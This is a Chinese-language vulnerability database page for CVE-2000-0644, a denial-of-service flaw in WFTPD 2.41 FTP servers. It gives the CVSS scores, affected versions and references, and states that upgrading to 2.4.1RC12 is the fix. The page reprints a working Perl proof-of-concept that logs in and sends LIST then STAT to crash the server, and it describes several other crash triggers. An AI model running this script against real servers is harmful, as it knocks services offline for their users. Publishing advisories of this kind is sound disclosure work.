CVE-2000-0644
CVSS5.0
发布时间 :2000-07-21 00:00:00
修订时间 :2008-09-10 15:05:31
NMCOES    

[原文]WFTPD and WFTPD Pro 2.41 allows remote attackers to cause a denial of service by executing a STAT command while the LIST command is still executing.


[CNNVD]WFTPD和WFTPD Pro服务拒绝漏洞(CNNVD-200007-057)

        WFTPD和WFTPD Pro 2.41版本存在漏洞。远程攻击者通过LIST命令仍然执行时执行STAT命令从而导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:texas_imperial_software:wftpd:2.34
cpe:/a:texas_imperial_software:wftpd:2.40
cpe:/a:texas_imperial_software:wftpd:2.4.1_rc11
cpe:/a:texas_imperial_software:wftpd:2.4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0644
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0644
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-057
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1506
(VENDOR_ADVISORY)  BID  1506
http://archives.neohapsis.com/archives/bugtraq/2000-07/0295.html
(VENDOR_ADVISORY)  BUGTRAQ  20000721 WFTPD/WFTPD Pro 2.41 RC11 vulnerabilities.
http://xforce.iss.net/static/5003.php
(UNKNOWN)  XF  wftpd-stat-dos
http://www.osvdb.org/1477
(UNKNOWN)  OSVDB  1477

- 漏洞信息

WFTPD和WFTPD Pro服务拒绝漏洞
中危 未知
2000-07-21 00:00:00 2005-05-02 00:00:00
远程  
        WFTPD和WFTPD Pro 2.41版本存在漏洞。远程攻击者通过LIST命令仍然执行时执行STAT命令从而导致服务拒绝。

- 公告与补丁

        

- 漏洞信息 (20100)

WFTPD 2.4.1RC11 STAT/LIST Command DoS (EDBID:20100)
windows dos
2000-07-21 Verified
0 Blue Panda
N/A [点击下载]
source: http://www.securityfocus.com/bid/1506/info

WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.

1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existant file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.

#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends STAT without waiting for LIST to finish, which will cause the server
# to crash.
#

use IO::Socket;

$host = "ftp.host.com" ;
$port = "21";
$user = "anonymous";
$pass = "p\@nda";
$wait = 10;

# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

# Issue a LIST command, then STAT. If the STAT arrives before the LISTing
# is finished, the server will crash.
print $socket "USER $user\nPASS $pass\nLIST\nSTAT\n";

# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}

# Finished.
close($socket);
print "\nConnection closed. Finished.\n"
		

- 漏洞信息

1477
Windows NT FTP Server (WFTP) STAT/LIST Command Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-07-21 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.4.1RC12 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

WFTPD 2.4.1RC11 Multiple Vulnerabilities
Input Validation Error 1506
Yes Yes
2000-07-21 12:00:00 2009-07-11 02:56:00
Posted to BugTraq on July 21, 2000 by Blue Panda <bluepanda@dwarf.box.sk>

- 受影响的程序版本

Texas Imperial Software WFTPD 2.40
- Microsoft Windows 3.11
- Microsoft Windows 3.11
- Microsoft Windows 3.1
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5
Texas Imperial Software WFTPD 2.34
- Microsoft Windows 3.11
- Microsoft Windows 3.11
- Microsoft Windows 3.1
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5
Texas Imperial Software WFTPD 2.4.1 RC11
Texas Imperial Software WFTPD 2.4.1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0
Texas Imperial Software WFTPD 2.4.1 RC12
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0

- 不受影响的程序版本

Texas Imperial Software WFTPD 2.4.1 RC12
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0

- 漏洞讨论

WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.

1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existant file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.

- 漏洞利用

exploit available

- 解决方案

Update to WFTPD 2.4.1RC12

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站